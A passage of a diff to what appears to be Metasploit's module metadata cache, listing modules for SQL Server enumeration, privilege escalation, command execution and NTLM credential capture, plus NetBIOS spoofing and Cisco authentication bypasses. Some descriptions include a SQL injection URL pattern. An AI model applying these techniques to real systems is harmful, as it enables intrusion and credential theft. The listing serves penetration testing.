1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-02-19 10:57:53 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum_domain_accounts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum_domain_accounts_sqli": { + "name": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration", + "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind ", + "antti " + ], + "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", + "references": [ + "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum_domain_accounts_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_enum_sql_logins": { + "name": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", + "fullname": "auxiliary/admin/mssql/mssql_enum_sql_logins", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.", + "references": [ + "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2023-12-12 09:53:37 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_enum_sql_logins", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_dbowner": { + "name": "Microsoft SQL Server Escalate Db_Owner", + "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. Once\n the user has the sysadmin role the msssql_payload module can be used to obtain\n a shell on the system.", + "references": [ + "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_dbowner", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_dbowner_sqli": { + "name": "Microsoft SQL Server SQLi Escalate Db_Owner", + "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to escalate SQL Server user privileges to sysadmin through a web\n SQL Injection. In order to escalate, the database user must to have the db_owner role in\n a trustworthy database owned by a sysadmin user. Once the database user has the sysadmin\n role, the mssql_payload_sqli module can be used to obtain a shell on the system.\n\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", + "references": [ + "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_dbowner_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_execute_as": { + "name": "Microsoft SQL Server Escalate EXECUTE AS", + "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user. In most cases, this results in additional data access, but in\n some cases it can be used to gain sysadmin privileges.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_execute_as", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_escalate_execute_as_sqli": { + "name": "Microsoft SQL Server SQLi Escalate Execute AS", + "fullname": "auxiliary/admin/mssql/mssql_escalate_execute_as_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been\n assigned to the user via error based SQL injection. In most cases, this results in\n additional data access, but in some cases it can be used to gain sysadmin privileges.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/ms178640.aspx" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_escalate_execute_as_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_exec": { + "name": "Microsoft SQL Server Command Execution", + "fullname": "auxiliary/admin/mssql/mssql_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "tebo ", + "arcc " + ], + "description": "This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the\n sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is\n required to use this module.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx", + "URL-https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_exec.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_findandsampledata": { + "name": "Microsoft SQL Server Find and Sample Data", + "fullname": "auxiliary/admin/mssql/mssql_findandsampledata", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Scott Sutherland ", + "Robin Wood ", + "humble-desser ", + "Carlos Perez ", + "hdm ", + "todb " + ], + "description": "This script will search through all of the non-default databases\n on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS\n option. If column names are found that match the defined keywords and data is present\n in the associated tables, the script will select a sample of the records from each of\n the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results\n output in a CSV format.", + "references": [ + "URL-http://www.netspi.com/blog/author/ssutherland/" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_findandsampledata", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_idf": { + "name": "Microsoft SQL Server Interesting Data Finder", + "fullname": "auxiliary/admin/mssql/mssql_idf", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Robin Wood " + ], + "description": "This module will search the specified MSSQL server for\n 'interesting' columns and data.\n\n This module has been tested against the latest SQL Server 2019 docker container image (22/04/2021).", + "references": [ + "URL-http://www.digininja.org/metasploit/mssql_idf.php" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_idf.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_idf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_ntlm_stealer": { + "name": "Microsoft SQL Server NTLM Stealer", + "fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind " + ], + "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the supplied\n credentials to connect to the target SQL Server instance and execute the native\n \"xp_dirtree\" or \"xp_fileexist\" stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used\n to connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper. Thanks to \"Sh2kerr\" who wrote the ora_ntlm_stealer for the\n inspiration.", + "references": [ + "URL-https://en.wikipedia.org/wiki/SMBRelay" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_ntlm_stealer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_ntlm_stealer_sqli": { + "name": "Microsoft SQL Server SQLi NTLM Stealer", + "fullname": "auxiliary/admin/mssql/mssql_ntlm_stealer_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "nullbind ", + "Antti " + ], + "description": "This module can be used to help capture or relay the LM/NTLM credentials of the\n account running the remote SQL Server service. The module will use the SQL\n injection from GET_PATH to connect to the target SQL Server instance and execute\n the native \"xp_dirtree\" or stored procedure. The stored procedures will then\n force the service account to authenticate to the system defined in the SMBProxy\n option. In order for the attack to be successful, the SMB capture or relay module\n must be running on the system defined as the SMBProxy. The database account used to\n connect to the database should only require the \"PUBLIC\" role to execute.\n Successful execution of this attack usually results in local administrative access\n to the Windows system. Specifically, this works great for relaying credentials\n between two SQL Servers using a shared service account to get shells. However, if\n the relay fails, then the LM hash can be reversed using the Halflm rainbow tables\n and john the ripper.", + "references": [ + "URL-https://en.wikipedia.org/wiki/SMBRelay" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_ntlm_stealer_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_sql": { + "name": "Microsoft SQL Server Generic Query", + "fullname": "auxiliary/admin/mssql/mssql_sql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "tebo " + ], + "description": "This module will allow for simple SQL statements to be executed against a\n MSSQL/MSDE instance given the appropriate credentials.", + "references": [ + "URL-http://www.attackresearch.com", + "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx" + ], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mssql/mssql_sql_file": { + "name": "Microsoft SQL Server Generic Query from File", + "fullname": "auxiliary/admin/mssql/mssql_sql_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "j0hn__f : " + ], + "description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.", + "references": [], + "platform": "", + "arch": "", + "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], + "targets": null, + "mod_time": "2024-03-05 13:27:00 +0000", + "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb", + "is_install_path": true, + "ref_name": "admin/mssql/mssql_sql_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mssql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mysql/mysql_enum": { + "name": "MySQL Enumeration Module", + "fullname": "auxiliary/admin/mysql/mysql_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Carlos Perez " + ], + "description": "This module allows for simple enumeration of MySQL Database Server\n provided proper credentials to connect remotely.", + "references": [ + "URL-https://cisecurity.org/benchmarks.html" + ], + "platform": "", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-03-28 10:34:38 +0000", + "path": "/modules/auxiliary/admin/mysql/mysql_enum.rb", + "is_install_path": true, + "ref_name": "admin/mysql/mysql_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/mysql/mysql_sql": { + "name": "MySQL SQL Generic Query", + "fullname": "auxiliary/admin/mysql/mysql_sql", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Bernardo Damele A. G. " + ], + "description": "This module allows for simple SQL statements to be executed\n against a MySQL instance given the appropriate credentials.", + "references": [], + "platform": "", + "arch": "", + "rport": 3306, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-02-14 15:26:34 +0000", + "path": "/modules/auxiliary/admin/mysql/mysql_sql.rb", + "is_install_path": true, + "ref_name": "admin/mysql/mysql_sql", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "mysql" + ], + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/natpmp/natpmp_map": { + "name": "NAT-PMP Port Mapper", + "fullname": "auxiliary/admin/natpmp/natpmp_map", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jon Hart " + ], + "description": "Map (forward) TCP and UDP ports on NAT devices using NAT-PMP", + "references": [], + "platform": "", + "arch": "", + "rport": 5351, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb", + "is_install_path": true, + "ref_name": "admin/natpmp/natpmp_map", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/netbios/netbios_spoof": { + "name": "NetBIOS Response Brute Force Spoof (Direct)", + "fullname": "auxiliary/admin/netbios/netbios_spoof", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "vvalien", + "hdm ", + "tombkeeper" + ], + "description": "This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.", + "references": [], + "platform": "", + "arch": "", + "rport": 137, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb", + "is_install_path": true, + "ref_name": "admin/netbios/netbios_spoof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/arista_config": { + "name": "Arista Configuration Importer", + "fullname": "auxiliary/admin/networking/arista_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports an Arista device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/networking/arista_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/arista_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "Reliability": [], + "SideEffects": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/brocade_config": { + "name": "Brocade Configuration Importer", + "fullname": "auxiliary/admin/networking/brocade_config", + "aliases": [ + "auxiliary/admin/brocade/brocade_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a Brocade device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/networking/brocade_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/brocade_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_asa_extrabacon": { + "name": "Cisco ASA Authentication Bypass (EXTRABACON)", + "fullname": "auxiliary/admin/networking/cisco_asa_extrabacon", + "aliases": [ + "auxiliary/admin/cisco/cisco_asa_extrabacon" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Sean Dillon ", + "Zachary Harding ", + "Nate Caroe ", + "Dylan Davis ", + "William Webb ", + "Jeff Jarmoc ", + "Equation Group", + "Shadow Brokers" + ], + "description": "This module patches the authentication functions of a Cisco ASA\n to allow uncredentialed logins. Uses improved shellcode for payload.", + "references": [ + "CVE-2016-6366", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp", + "URL-https://github.com/RiskSense-Ops/CVE-2016-6366" + ], + "platform": "", + "arch": "", + "rport": 161, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_asa_extrabacon", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "EXTRABACON" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "PASS_DISABLE", + "description": "Disable password authentication." + }, + { + "name": "PASS_ENABLE", + "description": "Enable password authentication." + } + ] + }, + "auxiliary_admin/networking/cisco_config": { + "name": "Cisco Configuration Importer", + "fullname": "auxiliary/admin/networking/cisco_config", + "aliases": [ + "auxiliary/admin/cisco/cisco_config" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports a Cisco IOS or NXOS device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_config.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_config", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_dcnm_auth_bypass": { + "name": "Cisco DCNM auth bypass", + "fullname": "auxiliary/admin/networking/cisco_dcnm_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-01", + "type": "auxiliary", + "author": [ + "MR_ME", + "Yann Castel (yann.castel " + ], + "description": "This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.\n After that, you can login to the web interface with those credentials.\n The only necessary condition is the more or less recent connection of an admin as this exploit\n uses a kind of session stealing.", + "references": [ + "CVE-2019-15975", + "EDB-48018" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-03-31 23:53:41 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_dcnm_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_dcnm_download": { + "name": "Cisco Data Center Network Manager Unauthenticated File Download", + "fullname": "auxiliary/admin/networking/cisco_dcnm_download", + "aliases": [ + "auxiliary/admin/cisco/cisco_dcnm_download" + ], + "rank": 300, + "disclosure_date": "2019-06-26", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "DCNM exposes a servlet to download files on /fm/downloadServlet.\n An authenticated user can abuse this servlet to download arbitrary files as root by specifying\n the full path of the file.\n This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should\n work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit\n (see References to understand why).", + "references": [ + "CVE-2019-1619", + "CVE-2019-1621", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass", + "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-dcnm-rce.txt", + "URL-https://seclists.org/fulldisclosure/2019/Jul/7" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-01-13 18:55:39 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_dcnm_download.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_dcnm_download", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_secure_acs_bypass": { + "name": "Cisco Secure ACS Unauthorized Password Change", + "fullname": "auxiliary/admin/networking/cisco_secure_acs_bypass", + "aliases": [ + "auxiliary/admin/cisco/cisco_secure_acs_bypass" + ], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Jason Kratzer " + ], + "description": "This module exploits an authentication bypass issue which allows arbitrary\n password change requests to be issued for any user in the local store.\n Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n as version 5.2 with either no patches or patches 1 and 2 are vulnerable.", + "references": [ + "BID-47093", + "CVE-2011-0951", + "URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2020-07-16 05:43:52 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_secure_acs_bypass", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/cisco_vpn_3000_ftp_bypass": { + "name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access", + "fullname": "auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass", + "aliases": [ + "auxiliary/admin/cisco/vpn_3000_ftp_bypass" + ], + "rank": 300, + "disclosure_date": "2006-08-23", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n 3000 series. It is possible to execute some FTP statements without authentication\n (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n when working with CWD commands. This module simply creates an arbitrary directory,\n verifies that the directory has been created, then deletes it and verifies deletion\n to confirm the bug.", + "references": [ + "BID-19680", + "CVE-2006-4313", + "OSVDB-28139", + "OSVDB-28138" + ], + "platform": "", + "arch": "", + "rport": 21, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb", + "is_install_path": true, + "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/networking/f5_config": { + "name": "F5 Configuration Importer", + "fullname": "auxiliary/admin/networking/f5_config", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "h00die" + ], + "description": "This module imports an F5 device configuration.", + "references": [], + "platform": "", + "arch": "", + "rport": 22, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": 